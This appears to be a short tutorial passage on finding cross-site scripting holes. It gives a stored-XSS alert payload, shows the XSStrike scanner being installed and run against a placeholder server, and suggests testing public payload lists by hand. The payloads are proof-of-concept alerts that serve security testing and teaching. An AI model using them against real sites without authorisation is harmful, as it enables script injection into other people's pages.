XSS

Stored XSS

Test whether the page is vulnerable to XSS by submitting the following payload in the input field (for stored XSS, one whose value is saved and rendered back to visitors). If an alert box pops up showing the page's origin, the input was rendered as script. alert(window.origin) is preferred over a fixed value such as alert(1) because it shows which origin the payload actually executed in, which matters when the stored input is rendered by a different page or host than the one it was submitted to:

<script>alert(window.origin)</script>

XSS Discovery

Some of the common open-source tools that can assist us in XSS discovery are XSStrike, BruteXSS, and XSSer.

neutron@kali[/kali]$ git clone https://github.com/s0md3v/XSStrike.git
neutron@kali[/kali]$ cd XSStrike
neutron@kali[/kali]$ pip install -r requirements.txt
neutron@kali[/kali]$ python xsstrike.py

XSStrike v3.1.4
...SNIP...

Reflected XSS example

neutron@kali[/kali]$ python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test" 

        XSStrike v3.1.4

[~] Checking for DOM vulnerabilities 
[+] WAF Status: Offline 
[!] Testing parameter: task 
[!] Reflections found: 1 
[~] Analysing reflections 
[~] Generating payloads 
[!] Payloads generated: 3072 
------------------------------------------------------------
[+] Payload: <HtMl%09onPoIntERENTER+=+confirm()> 
[!] Efficiency: 100 
[!] Confidence: 10 
[?] Would you like to continue scanning? [y/N]

Manual Discovery

The most basic method of looking for XSS vulnerabilities is manually testing various XSS payloads against an input field in a given web page. We can find huge lists of XSS payloads online, like the one on PayloadAllTheThings or the one in PayloadBox. We can then test these payloads one by one by pasting each into the form and checking whether an alert box pops up. Because these lists contain thousands of entries, it is also worth inspecting the response source for each attempt: a payload that comes back verbatim (not HTML-encoded) is the one to investigate further, even if it did not trigger an alert in its current position.